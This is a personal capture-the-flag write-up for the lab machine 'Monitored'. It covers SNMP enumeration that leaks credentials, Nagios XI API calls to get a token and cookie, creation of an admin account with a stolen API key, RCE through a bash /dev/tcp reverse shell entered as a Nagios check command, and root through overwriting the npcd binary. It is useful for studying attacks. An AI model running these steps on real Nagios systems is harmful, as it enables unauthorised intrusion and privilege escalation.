Monitored

My note about Monitored machine

Enumeration :

Host is up (0.28s latency).                                                                
Not shown: 977 open|filtered udp ports (no-response)                                       
Bug in snmp-win32-software: no string output.                                              
PORT      STATE  SERVICE        VERSION                                                    
20/udp    closed ftp-data
123/udp   open   ntp            NTP v4 (unsynchronized)
| ntp-info: 
|_  
161/udp   open   snmp           SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-sysdescr: Linux monitored 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64
|_  System uptime: 2h39m49.63s (958963 timeticks)
| snmp-processes: 
|   1: 
|   2: 
|   3: 
|   4: 
|   5: 
|   6: 
|   8: 
|   9: 
|   10: 
|   11: 
|   12: 
|   13: 
|   15: 
|   16: 
|   17: 
|   18: 
|   20: 
|   23: 
|   24: 
|   25: 
|   26: 
|   27: 
|   28: 
|   29: 
|   30: 
|   31: 
|   50: 
|   51: 
|   52: 
|   53: 
|   54: 
|   55: 
|   56: 
|   57: 
|_  58: 
| snmp-interfaces: 
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Traffic stats: 1.85 Mb sent, 1.85 Mb received
|   VMware VMXNET3 Ethernet Controller
|     IP address: 10.10.11.248  Netmask: 255.255.254.0
|     MAC address: 00:50:56:b9:1a:fa (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|_    Traffic stats: 135.05 Mb sent, 66.12 Mb received
| snmp-netstat: 
|   TCP  0.0.0.0:22           0.0.0.0:0
|   TCP  0.0.0.0:389          0.0.0.0:0
|   TCP  10.10.11.248:44534   10.10.14.62:1337
|   TCP  10.10.11.248:50556   10.10.14.62:1337
|   TCP  127.0.0.1:25         0.0.0.0:0
|   TCP  127.0.0.1:3306       0.0.0.0:0
|   TCP  127.0.0.1:5432       0.0.0.0:0
|   TCP  127.0.0.1:7878       0.0.0.0:0
|   TCP  127.0.0.1:59654      127.0.1.1:80
|   TCP  127.0.0.1:59658      127.0.1.1:80
|   UDP  0.0.0.0:68           *:*
|   UDP  0.0.0.0:123          *:*
|   UDP  0.0.0.0:161          *:*
|   UDP  0.0.0.0:162          *:*
|   UDP  10.10.11.248:123     *:*
|_  UDP  127.0.0.1:123        *:*
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 6f3fa7421af94c6500000000
|   snmpEngineBoots: 35
|_  snmpEngineTime: 2h39m49s
162/udp   open   snmp           net-snmp; net-snmp SNMPv3 server
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 5a44ab2146ff4c6500000000
|   snmpEngineBoots: 26
|_  snmpEngineTime: 2h58m12s
1040/udp  closed netarx
1090/udp  closed ff-fms
3659/udp  closed apple-sasl
4672/udp  closed rfa
5632/udp  closed pcanywherestat
17726/udp closed unknown
17762/udp closed unknown
19075/udp closed unknown
20872/udp closed unknown
21524/udp closed unknown
23980/udp closed unknown
31189/udp closed unknown
42431/udp closed unknown
47624/udp closed directplaysrvr
49157/udp closed unknown
49181/udp closed unknown
57410/udp closed unknown
57843/udp closed unknown
60381/udp closed unknown
Service Info: Host: monitored

Host script results:
|_clock-skew: 6s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5236.49 seconds

Note that have SNMP port is open .

Resource related : https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp

Output from snmpwalk : 

STRING: "-c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB "

Add https://nagios.monitored.htb to host and navigate to it ( port 80 open )

Founded login page : 

Username: svc
Password: XjH7VCehowpR1xZB
test login on this page but it's fail

But can login on https://nagios.monitored.htb/nagios instead

Nothing good

Testing and Scanning :

Get Auth token ( directory get from scanning ) : 

curl -s -XPOST -k -L 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1' -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=5' | tee /dev/tty | grep -o '"auth_token": "[^"]*' | grep -o '[^"]*$'

Get cookie : 


curl -s -k -c - https://nagios.monitored.htb/nagiosxi/login.php?token=$Auth_Token_get_from_previous_command | tee /dev/tty | grep "HttpOnly_nagios.monitored.htb" | awk '{print $NF}'

CVE research related : https://vuldb.com/?id.239985

  • sqlmap dump the user table :

Use api_key to create our own admin account to login : 

curl -s -XPOST "http://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=$API_KEY&pretty=1" -d "username=admin&password=admin&name=admin&email=admin@mail.com&auth_level=admin"

And login with that account at login page :

Move to RCE :

Add new commands :

Add New and add commands to reverseshell which is bash -c 'bash -i >& /dev/tcp/10.10.x.x/4444 0>&1' , Name we choose for later easy to look and Apply Configuration

Monitoring > Hosts > localhost

Choose the commands with the name had set in previous :

Run check commands to execute it

Setting netcat listen and get the user shell :

upgrade shell : export TERM=xterm

  • Getting Root :

sudo -l check :

  • Exploit mange_services.sh : ( We can stop npcd service )

sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd

Then edit file at /usr/local/nagios/bin/npcd:

Add #!/bin/bash and 'bash -i >& /dev/tcp/ip/port 0>&1'

Then setup another netcat listen and startup the npcd server -> got root shell

PreviousSurveillanceNextSkyfall

Last updated